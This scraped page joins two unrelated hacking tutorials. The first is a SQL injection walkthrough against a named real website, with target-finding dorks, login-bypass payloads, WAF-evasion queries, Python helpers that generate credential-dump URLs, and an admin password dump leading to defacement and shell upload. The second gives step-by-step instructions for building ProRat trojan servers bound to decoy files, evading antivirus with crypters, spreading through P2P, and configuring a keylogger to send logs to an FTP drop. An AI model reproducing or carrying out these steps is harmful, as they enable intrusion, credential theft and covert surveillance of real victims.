Basic SQL Injection Tutorial


Hello Friends !!!

I am CodeNinja a.k.a. Aakash Choudhary, and this is a basic SQL injection tutorial :-

What is SQL Injection:-

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

With SQL injection an attacker can read data the application never meant to expose and, depending on the privileges of the database account the application uses, modify it or go further. How far depends on the injection point and on those privileges.

Note:- This tutorial is for educational purposes. Learn the technique, but do not use it against sites you are not authorised to test.

So Let’s Start —->

Part 1:- Using Google Dorks

Google dorks (search queries that match patterns in URLs and page content) are a quick way to find pages that take parameters like id=, which are candidates for SQL injection. Use them wisely, and write your own once you see how they work.

Download a list of Google dorks from here :- http://pastebin.com/tq2TBbmB

You can find more dorks by searching Google.

How to use Google dorks :- pick a dork, paste it into Google, then choose any site from the results, like this —–>

http://lmgtfy.com/?q=inurl%3Atrainers.php%3Fid%3D

And pick any site from the results —>

http://prntscr.com/525zvj

That is all there is to Google dorks.

Part 2:- Check whether the site is vulnerable

Once we have a candidate page, the next step is to check whether its parameter is vulnerable to SQL injection.

To do this, append a single quote ' after the number:

eg. —–> http://www.tabletworld.co.in/order.php?pid=55'      <—— Notice the ' after the number

If the value is concatenated straight into the query, the extra quote leaves a string unterminated and the statement becomes invalid, so the database rejects it.

If the site is vulnerable you may see an error like this:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

This means the site is vulnerable, and the wording also tells you the backend is MySQL.

Sometimes the error is suppressed. Then compare the page with and without the quote: missing images, text or table rows mean the query failed.

Part 3:- Find the Injection Point

What is an injection point? It is the parameter whose value reaches the SQL query. Compare:

Normal Site :-

http://www.tabletworld.co.in

Injection Point of normal Site :-

http://prntscr.com/52689v

That is the injection point.

The question is how to find one on a particular site.

We use the following methods —->

1. Open every link on the site that carries a parameter and use the ' check from Part 2.

2. Use Google dorks (see below).

3. Enter SQL injection payloads in search boxes or login forms.

Some common payloads for form fields. Each one closes the quoted string the input lands in and adds a condition that is always true; the variants ending in -- or # comment out the rest of the query (in MySQL, -- only starts a comment when whitespace follows it):

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'
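To see why the ' probe from Part 2 produces that error and why the payloads above get past a login check, here is an added example (mine, not from the original tutorial) that runs a deliberately vulnerable login query and its parameterised counterpart against a constructed two-user table in Python's sqlite3 module, standing in for the site's MySQL backend. The single quote makes the concatenated statement invalid, the tautology payloads make it true for every row, and the bound-parameter version treats the same input as plain data. One difference from MySQL: SQLite accepts -- as a comment with nothing after it, while MySQL requires a following space.

```python
import sqlite3

# Constructed sample data standing in for a site's login table (not from the
# original page): two accounts, plaintext passwords to keep the demo short.
SAMPLE_USERS = [("admin", "s3cret"), ("bob", "hunter2")]


def _fresh_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return con


def login_vulnerable(username, password):
    """Builds the WHERE clause by string concatenation, the bug the tutorial
    exploits. Returns the sorted usernames that matched, or the string "error"
    when the database rejects the statement, which is the 'You have an error
    in your SQL syntax' signal the single-quote probe looks for."""
    con = _fresh_db()
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    try:
        return sorted(row[0] for row in con.execute(sql))
    except sqlite3.OperationalError:
        return "error"


def login_safe(username, password):
    """Same query with bound parameters: the driver sends the input as data,
    so quotes and comment markers inside it never change the statement."""
    con = _fresh_db()
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return sorted(row[0] for row in con.execute(sql, (username, password)))


if __name__ == "__main__":
    print(login_vulnerable("admin'", "x"))            # "error": the probe from Part 2
    print(login_vulnerable("admin", "' or '1'='1"))   # ['admin', 'bob']: tautology in the password field
    print(login_vulnerable("' or 1=1--", "x"))        # ['admin', 'bob']: comment drops the password check
    print(login_safe("admin", "' or '1'='1"))         # []: the payload is just a wrong password
```

Note where the payload goes: `' or '1'='1` in the username field alone does not log you in here, because AND binds tighter than OR and the password check still fails; in the password field, or with a comment that removes the rest of the clause, it matches every row.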

Now, on to finding injection points with Google dorks. Use the following dorks in Google and work through the results one by one.

1. inurl:.php?id= site:www.sitename.com

2. site:www.sitename.com “php?”

3.  site:www.target.com php

4. site:www.sitename.com .php? / .php?id=

5. On Bing —> ip:127.0.0.1 "php?id"   replacing 127.0.0.1 with the IP address of the target site

6. site:”*.site.com” inurl:”php?”

7. site.com/robots.txt   (paths the owner asked crawlers not to index, which can reveal script directories)

8.  inurl:”.php?id=”+site:www.site.com

Here is a live example using the dorks above:

inurl:.php?id= site:www.tabletworld.co.in

Here is the result :-

http://prntscr.com/526b0l

Pick any URL from the results.

I chose this one:

http://www.tabletworld.co.in/order.php?pid=55

That covers finding the injection point.

Part 4:- The actual injection, once we have a vulnerable site

Here is our target

http://www.tabletworld.co.in/order.php?pid=55

Step 1:- Append ' to the number

http://www.tabletworld.co.in/order.php?pid=55'

Error :-

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

So the site is vulnerable.

Step 2:- Find the number of columns

We need the number of columns the original SELECT returns, because a UNION must supply exactly that many. To find it we use one of these:

1. order by

2. group by

3. procedure analyse()

This time I am using only ORDER BY. When ORDER BY does not work, try GROUP BY.

procedure analyse() I will cover later.

Order by command (the trailing -- comments out whatever the original query had after our value; MySQL needs whitespace after --, so in a URL write --+ or -- - to be safe) ——–>

http://www.tabletworld.co.in/order.php?pid=55 order by 1--       <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 10--     <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 20--    <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 30--     <——- Error

Unknown column '30' in 'order clause'

ORDER BY n sorts by the n-th selected column, so it fails as soon as n exceeds the column count. The count is therefore at least 20 and less than 30.

Sometimes there is no error message, only missing content on the page, so compare carefully.

http://www.tabletworld.co.in/order.php?pid=55 order by 25--      <—— Error

Unknown column '25' in 'order clause'

So the count is less than 25.

http://www.tabletworld.co.in/order.php?pid=55 order by 24--       <—– No error 😀

So the query has 24 columns.

Step 3: Find vulnerable Columns

Next we find which of the 24 columns are actually displayed on the page; those are the positions where our expressions have to go.

We use this command ——–>  union select

http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Notice the - before 55. pid=-55 matches no row, so the original SELECT returns nothing and the page renders the row our UNION supplies; without it the page would keep showing the real product 55. Sometimes a negative id is not usable and other tricks are needed; when and what to use is for another tutorial.

After sending the UNION SELECT I saw this WAF message:

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

What is WAF —–> Web Application Firewall

A WAF filters requests that match attack signatures, to protect the site from attacks. Signature matching can often be evaded by rewriting the payload so the WAF no longer recognises it while the database still does.

Typical responses from a WAF that has blocked a request —->

406 Not acceptable

403 Forbidden

404

500

Different WAFs need different bypass methods.

Back to the site where we saw the error above.

To bypass this WAF we use MySQL version-specific comments —->

/*! */ like —> /*!union*/

or

/*!50000 */   —–> /*!50000union*/

MySQL executes the contents of /*!NNNNN ... */ when its own version is at least NNNNN (here 5.00.00); other parsers, including the WAF, see only a comment.

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

The displayed (vulnerable) columns are —-> 5 & 7

From now on our expressions go in those columns, like this:

For the version —–> version() & @@version

http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Note that version() replaces the 5 in column 5.

We can use both displayed columns, 5 and 7, at once.

Why check the version? Because it decides how we proceed:

If the version is 5.0 or later, information_schema exists and we can list tables and columns from it.

If it is below 5.0 there is no information_schema, and table and column names have to be guessed.
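Steps 2 and 3 above are one procedure: find the column count, then find which columns the page displays. The following added example (mine, not the tutorial's) models a page like order.php in Python with sqlite3: a constructed 24-column products table, a render function that splices pid into the query unquoted and shows only columns 5 and 7, and two probes against it. The column count is found by binary search over ORDER BY n, which generalises the 1, 10, 20, 30, 25, 24 sequence shown above; the displayed columns are found with the negative-id UNION SELECT 1,...,24 trick. The table layout, row data and rendering are assumptions for the demo; SQLite has no version comments or information_schema, so the WAF bypass and the later steps are not modelled here.

```python
import re
import sqlite3

NCOLS = 24  # constructed to match the 24-column query the tutorial finds
# Constructed rows: (pid, product name shown in column 5, status shown in column 7)
SAMPLE_ROWS = [(55, "Tablet X", "In stock"), (56, "Tablet Y", "Sold out")]


def _fresh_db():
    con = sqlite3.connect(":memory:")
    cols = ["c1 INTEGER"] + [f"c{i} TEXT" for i in range(2, NCOLS + 1)]
    con.execute(f"CREATE TABLE products ({', '.join(cols)})")
    for pid, name, status in SAMPLE_ROWS:
        values = [pid] + [""] * (NCOLS - 1)
        values[4] = name     # column 5
        values[6] = status   # column 7
        con.execute(f"INSERT INTO products VALUES ({','.join('?' * NCOLS)})", values)
    return con


def render_page(pid_param):
    """Stand-in for order.php: the pid parameter is spliced into the query
    unquoted (the vulnerability) and only columns 5 and 7 of the first row are
    rendered. A failed query yields an empty page, like a site that hides SQL
    errors, so the tester compares pages instead of reading error text."""
    con = _fresh_db()
    try:
        row = con.execute(f"SELECT * FROM products WHERE c1={pid_param}").fetchone()
    except sqlite3.OperationalError:
        return ""
    if row is None:
        return "<h1>No such product</h1>"
    return f"<h1>{row[4]}</h1><p>{row[6]}</p>"


def find_column_count(page_ok, max_cols=128):
    """Step 2, generalised: ORDER BY n succeeds for n <= column count and fails
    above it, so the count is found by binary search over n instead of probing
    1, 10, 20, 30, 25, 24 by hand. page_ok(n) must return True when the page
    with 'ORDER BY n' injected looks like the normal page."""
    if not page_ok(1):
        raise ValueError("ORDER BY 1 already breaks the page; wrong injection point?")
    if page_ok(max_cols):
        raise ValueError(f"more than {max_cols} columns; raise max_cols")
    lo, hi = 1, max_cols - 1  # invariant: page_ok(lo) holds, page_ok(hi + 1) fails
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if page_ok(mid):
            lo = mid
        else:
            hi = mid - 1
    return lo


def find_reflected_columns(ncols):
    """Step 3: a negative id so the real query returns no row, then
    UNION SELECT 1,2,...,n and read back which numbers appear in the page.
    Those positions are the displayed columns, where version() or table_name
    can later be placed. Numeric markers as on the page; on a real site use
    values that cannot occur in the HTML by accident."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    page = render_page(f"-55 union select {markers} -- -")
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", page)]


def demo():
    """Run both probes against the simulated page: (column count, displayed columns)."""
    baseline = render_page("55")

    def page_ok(n):
        return render_page(f"55 order by {n} -- -") == baseline

    ncols = find_column_count(page_ok)
    return ncols, find_reflected_columns(ncols)


if __name__ == "__main__":
    print(demo())  # (24, [5, 7])
```

The baseline comparison in `page_ok` is the "notice what is missing from the page" check from Step 2 made mechanical: any difference from the normal page counts as an error, which also works on sites that never print the MySQL message.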

Step 4:- Find tables data

Next we list the tables in the application's database.

The pieces of the query we need —–>

table_name

from

information_schema.tables

where

table_schema=database()

How and where do these go?

Lets see

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables where table_schema=database() --

Notice:- table_name sits in column 5 (a displayed column), and the FROM ... WHERE clause goes after the 24th column but before the --.

Remember this layout.

The result is again a WAF message:

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

So I wrap the from keyword in the same way —-> /*!50000from*/

How do you know which keyword the WAF is matching, and where to apply the bypass? By watching which variants get blocked; reading WAF behaviour before applying bypasses is the subject of another tutorial.

Here is the code:-

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() --

Result :-

http://prntscr.com/528q74

Notice the table name in the displayed column.

Now I also use some string functions —->

concat() ——> CONCAT joins two or more strings into one

group_concat() ——–> GROUP_CONCAT is an aggregate that joins a column's values from all matching rows into one comma-separated string, so every table name fits in a single displayed cell. It does not need a GROUP BY; without one it aggregates the whole result set.

concat_ws() ——-> CONCAT_WS joins values with a separator given as its first argument, e.g. concat_ws(0x3a,username,password)

On this site, group_concat() first trips the WAF —->

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() --

WAF Message —->

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

Bypass using /*!50000group_concat*/()

Like —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000group_concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() --

Now a different error —–>

FUNCTION marvelso_tabletworld.group_concat does not exist. Check the 'Function Name Parsing and Resolution' section in the Reference Manual

This does not mean GROUP_CONCAT is unavailable. The closing */ of the comment counts as whitespace, so MySQL sees group_concat (table_name) with a gap before the parenthesis, and for the built-in names covered by the 'Function Name Parsing and Resolution' rules (GROUP_CONCAT is one of them, CONCAT is not) that gap makes it look for a stored function of that name in the current database. Keeping the name and the ( adjacent avoids the problem; here we simply fall back to concat(), which is not affected.

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() --

Now result —->

http://prntscr.com/529rmf

You see the admin table there. What if you do not?

Two reasons —->

Maybe there is no admin table in the database

OR

With concat() we see only one row, so the other tables are simply not displayed

With group_concat we would see every table name on the page at once.

With concat we get a single table name per request, so to step through the others we use —->

limit 0,1

like this

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 0,1 --

LIMIT offset,count with a zero-based offset: step it up as limit 1,1, limit 2,1, limit 3,1 and so on, one table per request.

See code —>

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 1,1 --

And see the result —>

http://prntscr.com/529t6g

Notice the red mark: that is the second table in the database.

Next offset —>

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 3,1 --

Another result —>

http://prntscr.com/529tl2

The next table —> customer

That is how to page through results with concat() and LIMIT. Ask in the comments if anything is unclear.

Step 5:- Find Columns detail

Query pieces for this —->

column_name

from

information_schema.columns

where

table_name='table name here'

Note :-

Write the table name as a hex literal rather than a quoted string: a 0x... literal compares equal to the string, needs no quote characters (which WAFs often filter and which would otherwise have to survive the injection context), and is what the next query uses. Like this:

See this Code  —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e --

Where —-> 

0x61646d696e is —-> admin

Result —->

http://prntscr.com/529wlr

Again we use LIMIT to step through the columns

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e  limit 1,1--

Result —>

http://prntscr.com/529x8k

And the next column, with limit 2,1

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e  limit 2,1--

Result —->

http://prntscr.com/529xp7

So the columns of the admin table are —->

id,username,password

That is enough: now we can read the admin credentials.

Step 6:- Dump the admin credentials (username, password)

Commands ——>

concat(username,0x3a,0x3a,password)   <—– Where 0x3a is the hex encoding of :, used as a separator (two of them give ::)

from

table name here like admin

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(username,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ admin  --

Result:-

http://prntscr.com/52a00l

So we get the admin credentials from the database —>

username:- admin

password:- admin
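Steps 4, 5 and 6 build the same URL shape over and over: negative id, UNION SELECT with an expression in column 5, a FROM/WHERE tail, an optional LIMIT offset, and a closing comment. The added example below (mine, not from the original) generates those URLs in Python so that the hex encoding, the LIMIT stepping and the URL encoding are done by code rather than by hand. The target http://example.test/order.php is a placeholder, the 24 columns and the displayed column 5 are taken from the walkthrough, and the payload ends in -- - because MySQL only treats -- as a comment when whitespace follows it; the WAF bypass comments from the walkthrough are not included.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Placeholder target; an assumption for the example, not a real site.
BASE_URL = "http://example.test/order.php"


def mysql_hex(text):
    """Encode text as a MySQL hex literal so the payload needs no quote
    characters: mysql_hex("admin") == "0x61646d696e", mysql_hex(":") == "0x3a"."""
    return "0x" + text.encode("utf-8").hex()


def mysql_unhex(literal):
    """Reverse of mysql_hex, for reading hex literals back into text."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


def union_payload(ncols, reflected_col, expr, tail="", offset=None):
    """Assemble the injected value used in Steps 4 to 6: a negative id, a
    UNION SELECT with `expr` in the displayed column and numbers elsewhere,
    an optional FROM ... WHERE tail, an optional LIMIT offset,1 to read one
    row per request, and a closing comment. MySQL only treats '--' as a
    comment when whitespace follows it, so the payload ends in '-- -' rather
    than a bare '--' whose trailing space a browser or proxy could strip."""
    if not 1 <= reflected_col <= ncols:
        raise ValueError("reflected column out of range")
    columns = [str(i) for i in range(1, ncols + 1)]
    columns[reflected_col - 1] = expr
    parts = [f"-55 union select {','.join(columns)}"]
    if tail:
        parts.append(tail)
    if offset is not None:
        parts.append(f"limit {offset},1")
    parts.append("-- -")
    return " ".join(parts)


def inject_url(payload, base=BASE_URL, param="pid"):
    """Percent-encode the payload (spaces become %20, commas %2C, parentheses
    %28/%29) so it reaches the server exactly as built."""
    return f"{base}?{param}={quote(payload, safe='')}"


def decode_url(url, param="pid"):
    """What the server sees for `param` after URL decoding; used to check payloads."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[param][0]


def table_name_urls(ncols, reflected_col, count):
    """Step 4 with concat(): one URL per LIMIT offset, reading `count` table
    names of the current database from information_schema."""
    tail = "from information_schema.tables where table_schema=database()"
    return [inject_url(union_payload(ncols, reflected_col, "concat(table_name)", tail, offset=i))
            for i in range(count)]


def column_name_urls(ncols, reflected_col, table, count):
    """Step 5: the same against information_schema.columns, with the table
    name as a hex literal instead of a quoted string."""
    tail = f"from information_schema.columns where table_name={mysql_hex(table)}"
    return [inject_url(union_payload(ncols, reflected_col, "concat(column_name)", tail, offset=i))
            for i in range(count)]


def credential_dump_url(ncols, reflected_col, table, user_col, pass_col):
    """Step 6: user and password in one displayed cell, separated by ':' (0x3a)."""
    expr = f"concat({user_col},{mysql_hex(':')},{pass_col})"
    return inject_url(union_payload(ncols, reflected_col, expr, f"from {table}"))


if __name__ == "__main__":
    for url in column_name_urls(24, 5, "admin", 3):
        print(url)
    print(credential_dump_url(24, 5, "admin", "username", "password"))
```

Running `decode_url` on any generated URL returns the exact query fragment the database will see, which is a cheap way to catch a broken comment terminator or a stray quote before sending anything.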

Part 5:- What to do with the admin credentials

Find the site's admin login page, sign in with the recovered username and password, and you are in the admin panel, which controls the whole site. From there an attacker can —>

1. Deface the website

2. Upload a shell

3. Destroy the website

and much more.

How to find the admin page —–>

Try these paths —>

http://sitename.com/admin

http://sitename.com/administrator

http://sitename.com/login

http://sitename.com/robots.txt

These are a few; there are other methods, and admin-finder tools exist for this.

How to use all of this is for my next tutorials.

So stay tuned.

Regards  CodeNinja a.k.a. Aakash Choudhary

THANKS


HACK A SYSTEM USING RATs

Hi friends, this is Mystry. This is my first post, on hacking a system using RATs.
So what does RAT mean?

RAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous kinds of malware on the internet: an attacker who gets a RAT onto your computer has complete control of it. They can install a keylogger and other malware remotely, infect files on your system, and more. In this post I will cover what an attacker can do with your computer using a RAT and name some RATs commonly used by attackers.

What is a RAT?

As I said in the introduction, a RAT is a Remote Access Trojan: a program an attacker uses to get complete control of your computer. It can reach you disguised as an image, a video or any other file, and some RATs are not detected by antivirus software. So always be sure what you are downloading from the internet, and never save or open files that strangers send you by mail or in chat rooms.

 

What can you do with a RAT?

Once a RAT is installed on a computer the attacker can do almost anything with it. Some of the things a RAT allows:

Install any malicious software (keyloggers, ...)
Monitor chat windows
Turn off the system remotely
Disable antivirus, the registry editor and restore points
Steal passwords and software license keys
Access the Control Panel
Add or remove programs
Show fake error messages to the victim
Control printers
Format the entire hard drive
Open an FTP (File Transfer Protocol) session and transfer files
Control the internet browser
and more

Are RATs illegal?

Some remote-access tools are legitimate and some are not. The legitimate ones run with the user's knowledge, leave no hidden backdoor, and let the user close the connection at any time. The illegal ones are used for hacking and can steal data (credit cards, passwords, private data, etc.).

Here is a list of some legitimate and some illegal RATs:

Legal:

    • TeamViewer – access a remote computer over the internet as if sitting in front of it, even through firewalls
    • UltraVNC – open-source VNC remote support software
    • Ammyy Admin – remote access tool for remote assistance and administration
    • Mikogo – online meeting, web conferencing and remote support tool that shares your screen with up to 10 participants

Illegal:

    • Spy-Net
    • Cerberus Rat
    • CyberGate Rat
    • Sub Seven
    • Turkojan
    • ProRat
    • Ardamax (a keylogger rather than a full RAT; covered below)

How do I use these RATs?

For the legitimate tools, for example TeamViewer, the person whose computer is to be viewed gives the other party their ID and password; the other party enters the ID and connects. Once connected, the options are self-explanatory.

For the illegal RATs, the attacker forwards a port so the controller can listen on it, builds a server (the implant), spreads it to others, and whoever runs it is infected.

How do I port forward?

Port forwarding is easy, and it is needed for a RAT that uses a reverse connection: the infected machines connect back to the controller, so the controller's listening port must be reachable from the internet through the attacker's router. Open a browser, go to your router's address, log in (many routers still have default credentials such as admin/admin), open the port forwarding page and enter the port and the internal IP address of the machine running the controller. That is all; the port is now open.

How do I control the server?

Once installed, the RAT server is controlled from the RAT client: choose the PC from the list of connected IPs and connect.

Where and how do I spread it?

There are a few different ways the server gets spread: warez sites, P2P file sharing (uTorrent, The Pirate Bay, etc.), YouTube, and so on. Some people use custom auto-spreader programs.

What is a reverse connection?

A reverse connection is used to get around firewall and router restrictions on inbound ports: the infected host initiates the connection outward to the controller, so nothing has to be opened on the victim's side.

What is a direct connection?

In a direct-connect RAT the client (controller) connects directly to one or more servers (implants). A stable server is multi-threaded, so several clients can be connected at once, which also improves reliability.

How to work with RATs?

Step 1:
First download the remote administration software and install it on your system.

Step 2:
Create a server with the RAT software. Here the "server" is the trojan that will run on the victim's system and give us control of it.

Step 3:
Bind the server to another file (JPEG, doc, txt, ...) with a binder; most RATs include a binding option.

Step 4:
Send the file to the victim. Once the victim opens it the server starts running and, depending on its configuration, disables antivirus, the registry editor and so on.

Step 5:
Find the victim's IP address (there are different methods; read my previous articles). With the IP address, connect to the remote system from your remote administration tool.

Now the system is under your control.

Connections in RATs

Direct Connection:
In a direct connection our system (with the remote administration tool installed) is the client and the victim's system is the server. We find the victim's IP address, connect to it and take control. A firewall or NAT router in front of the victim will usually block inbound connections to the server's port.

Reverse Connection:

A reverse connection gets around those restrictions, because firewalls typically block inbound connections to open ports but not outgoing traffic.
In a direct connection the client connects to an open port on the server.
In a reverse connection the client opens the port and the server connects out to it.

Confusing? In simple words: in a reverse connection the victim's computer connects automatically to ours, while in a direct connection we have to connect to the victim's system using its IP address.
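The two topologies just described, as an added example (mine, not from the original post) in Python: the same two-line exchange is run twice over loopback, once with the controlled host listening and the controller connecting in (direct), once with the controller listening and the controlled host connecting out (reverse). Only the direction of the TCP connection changes, which is exactly what matters to a firewall or NAT that drops unsolicited inbound connections. The roles are simulated with threads in one process and exchange only a fixed greeting; the loopback address, OS-chosen ports and messages are constructed for the demo.

```python
import socket
import threading

HOST = "127.0.0.1"  # everything stays on loopback; both roles run in this process


def _listen():
    """Open a listening TCP socket on an OS-chosen free port."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((HOST, 0))
    sock.listen(1)
    return sock


def _serve_once(listener, name):
    """The listening side: accept one peer, read its line, answer, close."""
    conn, _ = listener.accept()
    with conn, listener:
        request = conn.recv(1024)
        conn.sendall(name.encode() + b" got: " + request)


def _connect_and_ask(port, name):
    """The initiating side: connect to the listener, send a line, return the reply."""
    with socket.create_connection((HOST, port)) as sock:
        sock.sendall(b"hello from " + name.encode())
        return sock.recv(1024).decode()


def direct_connection():
    """Direct connection: the controlled host LISTENS and the controller connects
    IN to it. This needs the host's IP address and an inbound path to its port,
    which a NAT router or a firewall that drops unsolicited inbound connections
    blocks."""
    agent_listener = _listen()
    port = agent_listener.getsockname()[1]
    agent = threading.Thread(target=_serve_once, args=(agent_listener, "agent"))
    agent.start()
    reply = _connect_and_ask(port, "controller")  # controller -> agent
    agent.join()
    return reply


def reverse_connection():
    """Reverse connection: the CONTROLLER listens and the controlled host connects
    OUT to it. Only outbound traffic leaves the host, which default firewall
    policy allows, and the controller never needs the host's IP address; it is
    the controller's port that must be reachable (hence the port forwarding
    section above)."""
    controller_listener = _listen()
    port = controller_listener.getsockname()[1]
    controller = threading.Thread(target=_serve_once, args=(controller_listener, "controller"))
    controller.start()
    reply = _connect_and_ask(port, "agent")  # agent -> controller
    controller.join()
    return reply


if __name__ == "__main__":
    print(direct_connection())   # agent got: hello from controller
    print(reverse_connection())  # controller got: hello from agent
```

In both runs the bytes on the wire are the same; what a defender sees differ is which side performed the TCP handshake, so egress monitoring (which internal host keeps connecting out to the same external port) is what catches the reverse case, not inbound port filtering.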

OKAY. NOW TO HACK A SYSTEM there are two types of RATs:

a)  RATs THAT NEED THE VICTIM'S IP (DIRECT CONNECTION)

EX: ProRat

b)  RATs THAT DO NOT NEED THE VICTIM'S IP (REVERSE CONNECTION)

EX: DarkComet RAT

NOW I WILL SHOW HOW TO SET UP RATS OF BOTH KINDS

NOW TYPE ONE

A)  HERE WE USE ProRat

Today I am going to show how to set up ProRat and take over a computer with it. I will finish the RAT setup articles with this and give the countermeasures in my next article.

Procedure to set up ProRat

STEP 1. Download ProRat (at your own risk: most copies circulating online are themselves backdoored)  and a crypter, used to evade antivirus detection (again at your own risk, and only inside a virtual machine).

STEP 2. Open the program; you should see its main window (screenshot).
STEP 3. Click the "Create" button at the bottom and choose "Create ProRat Server".

STEP 4. Enter your IP address so the server can connect back to you. You need not type it manually: clicking the little arrow fills it in automatically.
Next enter your e-mail address so that when a victim gets infected the server sends you a notification.

STEP 5. Open General settings. This is the most important tab. Here we choose the server port the program will connect through, the password you will be asked for when connecting to an infected victim, and the victim name. ProRat can also disable the Windows firewall and hide itself from Task Manager. Follow the steps as shown in the figure.

STEP 6. Click Bind with File to continue. Here you can bind the trojan server file with another file, such as an image, text file or PDF, so the victim trusts it.

STEP 7. Click Server Extensions to continue. Here you choose what kind of server file to generate. I prefer .exe files.

STEP 8. Click Server Icon to continue and choose an icon for the server file; the icon helps disguise what the file actually is.

STEP 9. Press Create Server. The server is written to the same folder as ProRat. Give this file to your victim; when the victim double-clicks it, their computer is under your control.

STEP 10. Now the attacker has a lot of options and can do many things with the victim's computer.

NOTE: In this tutorial I set the victim's IP to 127.0.0.1 because I am testing on my own computer. To take over a remote computer you need your victim's IP address. After creating the server, crypt it before spreading it.

That is how a server is created with ProRat.

NOW IT IS TIME FOR TYPE TWO:

B) Hack a Remote Computer Using Ardamax Keylogger

Things we need :-
1. Ardamax keylogger (download at your own risk and use only in a virtual machine)

2. An FTP account; you can create a free one at www.drivehq.com

3. A crypter, to evade antivirus detection (download at your own risk and use only in a virtual machine)

Procedure :-

1. After installing Ardamax keylogger, right-click its icon in the taskbar and select Enter registration key, then enter the name and serial number found in the downloaded folder.

2. Right-click the Ardamax keylogger icon again and select Remote Installation. Click Next twice, check all the boxes as shown, then click Next.

3. Click Enable and set a password so that nobody else can open the keylogger, then click Next three times. Check "Send logs every" and set an interval, say 5 minutes, select FTP as the delivery method, and click Next.

4. Enter the FTP account details you created earlier. In my case: FTP host ftp.drivehq.com, remote folder /logs, user test. Click Next.

5. Check all the boxes and click Next, set the interval for capturing screenshots, and click Next. If you want, change the icon with Change Icon as shown. Click Next and then Finish.

